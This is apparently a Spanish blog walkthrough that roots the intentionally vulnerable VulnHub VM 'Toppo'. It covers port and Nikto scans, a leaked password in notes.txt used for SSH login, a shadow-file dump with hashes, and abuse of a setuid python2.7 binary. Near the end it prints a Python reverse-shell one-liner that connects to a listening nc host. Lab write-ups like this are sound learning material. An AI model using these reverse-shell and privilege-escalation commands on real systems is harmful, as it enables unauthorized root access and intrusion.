Esta pagina se ve mejor con JavaScript habilitado

Toppo

 ·  🎃 kr0m

Siguiendo con mis artcículos sobre hackeo de VMs vulnerables hoy conseguiremos root en una máquina llamada Toppo, el proceso no es extremadamente complejo pero tiene su miga.

Nos bajamos la imagen de VBox de VulnHub o de alfaexploit:
https://www.vulnhub.com/entry/toppo-1,245/
Toppo.vmdk

Echamos un vistazo a los servicios ofrecidos:

RX4 ☢ /home/kr0m> nmap -sT 192.168.20.103 -p 0-65535

Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-03 16:46 CEST
Nmap scan report for 192.168.20.103
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
56149/tcp open  unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

Lanzamos Nikto a ver que nos muestra:

RX4 ☢ /home/kr0m/nikto/program> ./nikto.pl -h http://192.168.20.103

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.20.103
+ Target Hostname:    192.168.20.103
+ Target Port:        80
+ Start Time:         2018-09-03 16:48:23 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-09-03 16:48:32 (GMT2) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Accediendo mediante Firefox vemos que existe un fichero llamado notes.txt

RX4 ☢ /home/kr0m> curl http://192.168.20.103/admin/notes.txt

Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

Con un poco de suerte tenemos acceso:

RX4 ☢ /home/kr0m> ssh ted@192.168.20.103

ted@192.168.20.103's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Nos bajamos linuxprivchecker:

wget http://www.securitysift.com/download/linuxprivchecker.py
chmod 700 linuxprivchecker.py

python linuxprivchecker.py

[+] Shadow File (Privileged)
 root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::
 ted:$6$P3kGAn0I$Yh0kqMyxQUd6wrBkWWZtlN30Xk4/UONrWecpA3D2o5OX12ZdWhdNt45KG0uiX3QlrcAgAFmoYHXbibaGEHkaK/:17777:0:99999:7:::

El script en python es capaz de dumpear el shadow sin permisos?

ted@Toppo:~$ cat /etc/shadow

cat: /etc/shadow: Permission denied

Seguimos investigando:

ted@Toppo:~$ ls -la /usr/bin/python

lrwxrwxrwx 1 root root 9 Mar 16 2015 /usr/bin/python -> python2.7
ted@Toppo:~$ ls -la /usr/bin/python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7

Ese setUID bueno, una vez mas vemos como unos permisos mal asignados pueden comprometer el sistema entero

Probamos a lanzar una shell desde el interprete de python:

ted@Toppo:~$ python -c “import pty;pty.spawn(’/bin/bash’)”

bash-4.3$ id

uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Intentemos una conexión reversa:

RX4 ✺ ~> nc -l -p 1234

ted@Toppo:~$ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.20.114”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

RX4 ✺ ~> nc -l -p 1234

# id

uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
Si te ha gustado el artículo puedes invitarme a un RedBull aquí